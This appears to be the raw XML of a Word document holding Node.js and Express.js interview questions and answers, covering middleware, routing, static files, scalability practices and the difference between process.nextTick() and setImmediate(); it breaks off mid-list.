          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>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Authentication in Express.js can be implemented using middleware. Popular libraries like passport.js can be used to authenticate requests. Custom middleware can also be created to check for tokens or session data before allowing access to certain routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001CADE"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lastRenderedPageBreak/>
        <w:t>11. What is app.use() in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD086C8" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>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app.use() is a method used to mount middleware functions at the specified path. If the path is not specified, the middleware is executed for every request. It’s often used for applying global middleware like logging, body parsing, or handling static files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF8239"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12. Explain the difference between app.use() and app.all() in Express.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC376D5" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>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app.use() is used to mount middleware that can handle all HTTP methods for a specific path. app.all() is used to route all HTTP methods to a specific path, not just middleware but also route handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342A8DF"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app.all('/example', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F55316E"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res.send('This matches all HTTP methods');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22560834"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985720E"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13. What is the role of express.Router() in Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7561A5" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>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express.Router() is a mini Express application that can be used to create modular, mountable route handlers. It helps in organizing routes by grouping them under a specific route and making the main app more modular and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FD9A0"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14. How do you serve static files using Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC8B25" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>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Static files (like images, CSS, JavaScript files) can be served using the built-in express.static middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDCFB9" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1"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app.use(express.static('public'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA6CC7D" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This will serve files from the public directory at the root level of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFC0E8" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15. What are some best practices for building scalable applications with Express.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08987AE5" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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Best practices include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF6B45" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using environment variables for configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B32C3A" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Structuring the application with a modular architecture (using express.Router()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B49812" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing proper error handling and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AACB4" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Securing the application with middleware for authentication, data validation, and sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290037C7" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using a reverse proxy (like Nginx) and load balancing for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C9B66" w14:textId="77777777" w:rsidR="009A4FD1" w:rsidRPr="00DA2F32" w:rsidRDefault="009A4FD1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21286808"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36" w:name="_Toc178383219"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q35. Explain the concept of asynchronous programming in Node.js.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="262BC516"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37" w:name="_Toc178383220"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q36. How do you use the npm package manager in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7834B016"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38" w:name="_Toc178383221"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q37. What is the difference between process.nextTick() and setImmediate() in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="42AB3444"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In Node.js, both process.nextTick() and setImmediate() are used to schedule the execution of callbacks, but they are used in different contexts and have distinct timing characteristics. Understanding the difference between the two is crucial for writing efficient and predictable asynchronous code in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00E939" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.nextTick()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67000559" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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process.nextTick() is used to schedule a callback to be invoked in the next iteration of the event loop, but before any I/O operations or timers are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA18C7" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: Callbacks passed to process.nextTick() are executed </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>immediately after the current operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> completes, but before the event loop continues. This means that process.nextTick() callbacks are executed before any I/O operations, timers (setTimeout, setInterval), or setImmediate callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F53DEA" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: It's typically used when you need to ensure that a certain piece of code runs after the current operation, but before any further asynchronous I/O events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16553FFC" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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BC7AE44"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console.log('start');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16755646"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2E7B80AA"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process.nextTick(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303CD4D"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console.log('nextTick callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7F11E"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0419E631"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70A0948E"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console.log('end');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6FF29C"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E6C74"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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A039892"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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770111BF"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nextTick callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F12BE33" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, nextTick callback is logged after end, even though it's scheduled before any other asynchronous I/O events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D17A770" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F1F5E" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>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setImmediate() is used to schedule a callback to be executed on the next iteration of the event loop, but after I/O events and timers have been processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE35562" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution Timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: Callbacks passed to setImmediate() are executed </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>after the current event loop iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and after I/O operations. This means that setImmediate() callbacks are placed in the check phase of the event loop, which occurs after the I/O events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F4A38" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: It's useful when you want to execute a callback after the current I/O cycle is complete but before any further code is executed in subsequent iterations of the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF3A54" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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1F76CB3B"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console.log('start');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F639C"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57D34F6"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setImmediate(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F657A50"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console.log('setImmediate callback');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63122AB3"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4AFCF47C"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653C229E"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console.log('end');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0904FA"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9BA82"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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11050783"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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDF0DA" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FC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setImmediate callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110DA0E2" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, setImmediate callback is logged after end, indicating that setImmediate callbacks are executed after the current synchronous code and I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1AEBB" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F9115A" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution Order</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B863C" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>process.nextTick(): Executes the callback immediately after the current operation, before I/O and timers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F96BCA" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>setImmediate(): Executes the callback after I/O events and timers in the next iteration of the event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8DC80" w14:textId="77777777" w:rsidR="00AA0FCE" w:rsidRPr="00DA2F32" w:rsidRDefault="00AA0FCE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
